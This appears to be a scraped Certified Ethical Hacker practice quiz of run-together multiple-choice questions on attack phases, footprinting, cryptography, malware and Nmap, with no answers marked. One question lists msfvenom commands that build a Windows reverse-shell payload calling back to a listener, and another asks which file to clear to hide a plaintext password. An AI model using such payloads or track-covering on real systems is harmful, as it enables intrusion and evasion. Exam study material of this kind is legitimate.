Certified Ethical Hacker Quiz 3 An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure?RobotiumBalenaCloudFlowmonIntentFuzzer Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?PrivateCommunityPublicHybrid Which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker?BotnetIntrusion detection systemFirewallHoneypot What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?White-hat hacking programBug bounty programEthical hacking programVulnerability hunting program Which file is a rich target to discover the structure of a website during web-server footprinting?domain.txtRobots.txtDocument rootindex.html Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are not true vulnerabilities. What will you call these issues?False positivesTrue negativesTrue positivesFalse negatives John is investigating web-application firewall logs and observers that someone is attempting to inject the following: char buff; buff = ‘a’; What type of attack is this?SQL injectionBuffer overflowCSRFXSS Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?ScanningGaining accessMaintaining accessReconnaissance By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?.xsession-log.profile.bashrc.bash_history Heather’s company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration including patching and monitoring. Which of the following is this type of solution?IaasSaasPaaSCaaS At what stage of the cyber kill chain theory model does data exfiltration occur?WeaponizationActions on objectivesCommand and controlInstallation Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message and how is Poly validating it?Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s private key.Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using Dorian’s public key. An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?Service-based solutionsProduct-based solutionsTree-based assessmentInference-based assessment Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced. Which of the following techniques is described in the above scenario?Website footprintingDark web footprintingVPN footprintingVoIP footprinting To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time. Which technique is discussed here?Subnet scanning techniquePermutation scanning techniqueHit-list scanning technique.Topological scanning technique Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network without a password. However, Jane has a long, complex password on her router. What attack has likely occurred?WardrivingWireless sniffingEvil twinPiggybacking In an attempt to increase the security of your network, you implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know it. How do you accomplish this?Delete the wireless networkLock all usersDisable SSID broadcastingRemove all passwords Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson’s machine. What is the social engineering technique Steve employed in the above scenario?Diversion theftQuid pro quoElicitationPhishing Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard?VoIP footprintingEmail footprintingWhois footprintingVPN footprinting John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization. What is the tool employed by John to gather information from the LDAP service?ike-scanZabasearchJXplorerEarthExplorer Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?Cloud cryptojackingMan-in-the-cloud (MITC) attackCloud hopper attackCloudborne attack Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?nmap -sn -POnmap -sn -PSnmap -sn -PAnmap -sn -PP Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can be performed by exploiting the above vulnerability?Padding oracle attackDROWN attackDUHK attackSide-channel attack What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f cmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f cmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exemsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe What is the port to block first in case you are suspicious that an IoT device has been compromised?224810180443 Which type of virus can change its own code and then cipher itself multiple times as it replicates?Stealth virusTunneling virusCavity virusEncryption virus SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an attacker?In-band SQLiUnion-based SQLiOut-of-band SQLiTime-based blind SQLi The network users are complaining because their systems are slowing down. Further, every time they attempt to go to a website, they receive a series of pop-ups with advertisements. What type of malware have the systems been infected with?TrojanSpywareVirusAdware John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?Use his own private key to encrypt the message.Use his own public key to encrypt the message.Use Marie’s private key to encrypt the message.Use Marie’s public key to encrypt the message. Sam is working as a system administrator in an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize the organization’s vulnerability management processes. The base score that Sam obtained after performing CVSS rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?CriticalMediumHighLow You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two employees’ emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at?ReconnaissanceWeaponizationCommand and controlExploitation Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used by Annie in the above scenario?Docker objectsDocker daemonDocker clientDocker registries Time is Up!